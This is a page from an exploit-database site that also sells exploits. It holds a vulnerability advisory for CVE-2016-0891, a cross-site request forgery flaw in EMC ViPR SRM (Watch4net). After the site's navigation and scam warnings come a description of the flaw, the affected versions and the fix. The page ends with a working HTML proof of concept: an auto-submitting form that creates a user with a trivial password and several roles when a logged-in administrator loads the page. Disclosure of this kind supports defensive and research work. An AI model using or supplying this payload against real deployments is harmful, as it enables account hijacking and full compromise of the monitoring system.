0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
EMC ViPR SRM - Cross-Site Request Forgery
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
<!-- EMC M&R (Watch4net) lacks Cross-Site Request Forgery protection Abstract It was discovered that EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net. Affected versions Versions of EMC ViPR SRM prior to version 3.7 are affected by these vulnerabilities. See also - ESA-2016-039 - CVE-2016-0891 Fix EMC released 34247_ViPR-SRM to fix these vulnerabilities. Please note that this fix is only available for registered EMC Online Support customers. Introduction EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard. EMC M&R is a core embedded software technology existing in EMC ViPR, ViPR SRM and Service Assurance Suite. EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net. Details Cross-Site Request Forgery (CSRF) is an attack, which forces an end user to execute unwanted actions on a web application to which the targeted user is currently authenticated. With a little help of social engineering an attacker may trick the users of a web application into executing actions (requests) of the attacker's choosing. The following proof of concept will create a new user named CSRF with password set to 1 in Watch4net - provided that the victim is logged in with an administrator account. --> <html> <body> <form action="http://<target>:58080/APG/admin/form" method="POST"> <input type="hidden" name="form-id" value="UserForm" /> <input type="hidden" name="ident" value="" /> <input type="hidden" name="old" value="" /> <input type="hidden" name="name" value="CSRF" /> <input type="hidden" name="password" value="1" /> <input type="hidden" name="confirm" value="1" /> <input type="hidden" name="title" value="" /> <input type="hidden" name="first-name" value="Han" /> <input type="hidden" name="last-name" value="Sahin" /> <input type="hidden" name="email" value="attacker@example.com" /> <input type="hidden" name="role" value="user" /> <input type="hidden" name="profile" value="0" /> <input type="hidden" name="user-roles" value="5" /> <input type="hidden" name="user-roles" value="1" /> <input type="hidden" name="user-roles" value="3" /> <input type="hidden" name="user-roles" value="4" /> <input type="hidden" name="user-roles" value="2" /> <input type="hidden" name="user-roles" value="6" /> <input type="hidden" name="filter" value="" /> <input type="hidden" name="custom" value="true" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> # 0day.today [2024-12-24] #